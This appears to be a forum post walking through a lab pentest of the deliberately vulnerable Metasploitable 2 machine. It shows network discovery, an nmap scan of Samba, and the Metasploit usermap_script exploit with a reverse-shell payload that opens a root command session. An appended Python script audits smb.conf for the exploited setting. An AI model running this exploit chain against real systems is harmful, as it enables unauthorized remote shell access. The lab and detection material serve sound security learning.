crossbower

Pentest on Metasploitable 2


The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMware, VirtualBox, and other common virtualization platforms.

root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24
Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts

8 Captured ARP Req/Rep packets, from 8 hosts. Total size: 372
__________________________________________________ ___________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.91 08:00:27:4a:6c:50 01 042 CADMUS COMPUTER SYSTEMS
192.168.1.202 08:00:27:32:43:96 01 042 CADMUS COMPUTER SYSTEMS
192.168.1.1 00:25:53:3e:bc:b9 01 042 Unknown vendor
192.168.1.100 00:09:f8:65:35:64 01 060 UNIMO TECHNOLOGY CO., LTD.
192.168.1.132 00:21:9b:20:a3:bb 01 060 Unknown vendor

Using the nmap scanner to identify the Samba service on port 139.

root@kali:~# nmap -p 139 -sV 192.168.1.91

Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for 192.168.1.91
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

And play the game:

root@kali:~# service postgresql start && service metasploit start && msfconsole

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 192.168.1.91
RHOST => 192.168.1.91
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 191.168.1.19
LHOST => 191.168.1.19
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BgB1yKJSt3wbArQy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nBgB1yKJSt3wbArQy\r\n
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

VIDEO TUT

http://www.youtube.com/watch?v=S3uvS3qEpm8

Edited by crossbower
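
For the defending side of the session above: the module name usermap_script refers to Samba's `username map script` option in smb.conf, which is unset by default. The following audit for an active setting is an added example, not part of the original post; the sample configuration and the script path in it are constructed.

```python
import re

# Constructed sample smb.conf; the script path is a placeholder.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/true
   User Name Map  Script = /etc/samba/scripts/mapusers.sh
   log file = /var/log/samba/log.%m
[tmp]
   path = /tmp
"""

# smb.conf ignores case and whitespace inside parameter names.
TARGET = "usernamemapscript"

def parse_smb_conf(text):
    """Yield (section, normalized_name, value, line_no) per parameter."""
    section, pending, start = None, "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not pending:
            if not line or line[0] in "#;":   # blank line or comment
                continue
            start = no
        if line.endswith("\\"):               # continued on the next line
            pending += line[:-1].rstrip() + " "
            continue
        line, pending = pending + line, ""
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' counts
            yield section, re.sub(r"\s+", "", name).lower(), value.strip(), start

def find_username_map_script(text):
    """Return one finding per active (non-empty) 'username map script'."""
    return [{"section": s, "line": n, "command": v}
            for s, name, v, n in parse_smb_conf(text)
            if name == TARGET and v]

if __name__ == "__main__":
    for f in find_username_map_script(SAMPLE_CONF):
        print("[%(section)s] line %(line)d: username map script = %(command)s" % f)
```

Feeding it the output of `testparm -s` audits the configuration as Samba itself parses it.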
